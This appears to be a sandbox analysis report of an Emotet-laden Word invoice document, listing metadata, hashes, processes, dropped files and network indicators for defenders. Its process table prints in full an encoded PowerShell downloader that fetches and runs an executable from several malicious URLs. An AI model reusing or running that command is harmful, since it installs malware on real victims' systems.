File name: | Requested invoice_L_8100.doc |
Full analysis: | https://app.any.run/tasks/af91f78d-1325-4df6-8307-6867e322b42f |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 09, 2019, 14:32:13 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: microchip, Subject: Path, Author: Favian Hackett, Keywords: distributed, Comments: Borders, Template: Normal.dotm, Last Saved By: Stevie Hettinger, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 8 14:50:00 2019, Last Saved Time/Date: Tue Oct 8 14:50:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 172, Security: 0 |
MD5: | F0A192D0F5FAA8B4439D4BC7CAD9FE39 |
SHA1: | 39A23A3F4E0AEBC042640DD51134810AE0734AA0 |
SHA256: | 7C99358A9100DF75F9BAB44700B907A5D04A1040814D15A221B0490AB5E55EB0 |
SSDEEP: | 3072:qT+y1EVIKgdzSrGEKyIwLx3OLSLK7TwtGmN40GUJHEkSwKtyc3:qT+y1EVIKUzS3nLx3OIN40FK |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Cummerata |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 201 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Bayer LLC |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 172 |
Words: | 30 |
Pages: | 1 |
ModifyDate: | 2019:10:08 13:50:00 |
CreateDate: | 2019:10:08 13:50:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Stevie Hettinger |
Template: | Normal.dotm |
Comments: | Borders |
Keywords: | distributed |
Author: | Favian Hackett |
Subject: | Path |
Title: | microchip |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2928 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Requested invoice_L_8100.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2732 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADAAOAAwADkAOQBjADgANgAwADYAPQAnAGMANwB4ADMAMAA0ADAAMAA2ADQANwAzACcAOwAkAGIAOQA3ADYAMAAwADgANQAwAGMAeAAgAD0AIAAnADEANAAnADsAJABjADAAMQAxAHgAYwAyAGMAOQAzADAAMwAwAD0AJwBjAHgANgAxADAAeAA0ADUAMQA4ADgANAA3ACcAOwAkAHgANwA0ADIANwAzADQAYgAzADEAOQB4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABiADkANwA2ADAAMAA4ADUAMABjAHgAKwAnAC4AZQB4AGUAJwA7ACQAYgA5ADkAMwAwADAAOAAzADAANQA4AD0AJwBjADAAeAB4AGMAOAA2ADYAMAAwAGMAJwA7ACQAYgAwADMAYwAwAGIAMwAwADQAMAA1AD0AJgAoACcAbgAnACsAJwBlAHcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABuAGUAVAAuAFcARQBiAGMATABJAEUAbgBUADsAJAB4AGIAMAA5ADcANQA4ADAAYgAxADAAPQAnAGgAdAB0AHAAOgAvAC8AaABvAG0AZQB0AG8AdwBuAGYAbABvAG8AcgBpAG4AZwB3AGYALgBjAG8AbQAvAGIAaQByAHQAaABkAGEAeQBfAHAAbwBwAHUAcAAvADEANABzAG0AMgBlAHUAaABhAC0AOQB5AG4AbgBkADcALQAwADcAOQAxAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBjAG8AcABpAGUAcgBtAGEAdABpAGMAYQAuAGMAbwBtAC8AcwBvAHgANgAyAGMALwBaAFQARwBaAGgARgAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGEAbgBoAGoAZQBuAGQAYQAuAG4AZQB0AC8AcgBvAGMAdwA4AGgAeQAvAGEAZAB4AGEANQAxAC0ANQBsADUAMABsADcAdABmAGwALQA5ADIAMwAvAEAAaAB0AHQAcAA6AC8ALwBsAGEAcABhAGsAbQBhAG4AaQBzAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ASwBuAGoAdABaAGoALwBAAGgAdAB0AHAAOgAvAC8AbQBhAGkAcwB2AGkAcwBpAHQAYQBkAG8AcwAuAGMAbwBtAC4AYgByAC8AcABlAGQAaQBkAG8ALQBvAG4AbABpAG4AZQAvAGEAcgBtAC0AcABuADgALQA5ADAALwAnAC4AIgBTAHAAYABMAGkAVAAiACgAJwBAACcAKQA7ACQAeAAwADcAMwA5ADgAOAA3ADAAMgA4ADYAPQAnAHgAOAA3ADAAYwA4AGIANgAyADcAOAAnADsAZgBvAHIAZQBhAGMAaAAoACQAeAA4ADQANwA4ADUAMAAwADAAYwBjADAAMAAgAGkAbgAgACQAeABiADAAOQA3ADUAOAAwAGIAMQAwACkAewB0AHIAeQB7ACQAYgAwADMAYwAwAGIAMwAwADQAMAA1AC4AIgBkAG8AYABXAG4ATABPAGAAQQBkAGYAYABpAEwAZQAiACgAJAB4ADgANAA3ADgANQAwADAAMABjAGMAMAAwACwAIAAkAHgANwA0ADIANwAzADQAYgAzADEAOQB4ACkAOwAkAGMANgAwADAANwA3ADUANQA4ADAANwA5ADAAPQAnAHgAOAA0ADYANAA2ADMAMABjADAAMABjADEAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJAB4ADcANAAyADcAMwA0AGIAMwAxADkAeAApAC4AIgBMAEUAYABOAGAAZwBUAGgAIgAgAC0AZwBlACAAMwA1ADMAMwAwACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAdABgAEEAcgBUACIAKAAkAHgANwA0ADIANwAzADQAYgAzADEAOQB4ACkAOwAkAGMANQAwADgAYgB4ADMAYgAwADIAOAA3ADAAPQAnAHgAMAA0ADMANwAxAGIAMAAzADgAOAAnADsAYgByAGUAYQBrADsAJABiADUAMQA5ADAAMAAwADIAMQBiADcAYwAzAD0AJwB4ADAAOQAwAGIAMAAwADIAMAA0AGMAMAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABiAHgANQAzADQANQA2AHgAMAA4AGMAYwA9ACcAYwAwADEAMQAwADYAMAA0ADAAOQA2AHgAMAAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2116 | "C:\Users\admin\14.exe" | C:\Users\admin\14.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2660 | --b731438d | C:\Users\admin\14.exe | 14.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2372 | "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | — | 14.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3008 | --f91b2738 | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | — | msptermsizes.exe |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4DA0.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2732 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HKU097U23ER9RMBHL3LF.temp | — | |
MD5:— | SHA256:— | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:CB0890A34CBD6E1BE368D4CBC9212F34 | SHA256:2913ED40B1A05DF7601B950AD1775A6BF15ABDA50CC4217E265085D78674A255 | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CB582E03.wmf | wmf | |
MD5:B8494D6E2E4DB567A725CA9363781E77 | SHA256:7A0E8070CFE40A63932BC9191EC7C3E8B2F5C3E5B79AC84A14D5A882CA89DCAA | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:E109A488BC9A812D264818B379F9737C | SHA256:2D15B5790436C9DDCFA625D9D5A80CCD1AEB473D1628CD75B8F80662E867B3E0 | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:37B026D0B988DCA6B6604AD23801B943 | SHA256:E718A2DFDA4EB4919B724031B3201A10AA8B5CB726DF57A70056CEBCEE147A9A | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5F7C91FF.wmf | wmf | |
MD5:3C42744A300846ADA2FF73700045443D | SHA256:B528F10328D412295BA0407DFF1391E48AF61CA90B889CC5DAD9634C35BFBB90 | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Requested invoice_L_8100.doc.LNK | lnk | |
MD5:212F3DC323A5DC8783165818D66B6506 | SHA256:AC8955F5A98F1A3E706487E3EF64126EB24193E10E406B3D10C6DE35DC7AE101 | |||
2928 | WINWORD.EXE | C:\Users\admin\Desktop\~$quested invoice_L_8100.doc | pgc | |
MD5:088C8C30118AD4B21BBC1F11F80BD9EF | SHA256:6C4EFE4D4657790428310E6B1FBA7D7E5FAECFD26C7991DF8067A1DB04D7423D | |||
2928 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F4BA876.wmf | wmf | |
MD5:276491F4C73C63BB8D84001E782AC996 | SHA256:22CA0E530DE62AAE7EDB15A8F92BF974620B1F9BECD6B088A3F51BFF23280F4C |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2732 | powershell.exe | GET | 200 | 166.62.112.199:80 | http://hometownflooringwf.com/birthday_popup/14sm2euha-9ynnd7-0791/ | US | executable | 136 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2732 | powershell.exe | 166.62.112.199:80 | hometownflooringwf.com | GoDaddy.com, LLC | US | malicious |
Domain | IP | Reputation |
---|---|---|
hometownflooringwf.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2732 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2732 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2732 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |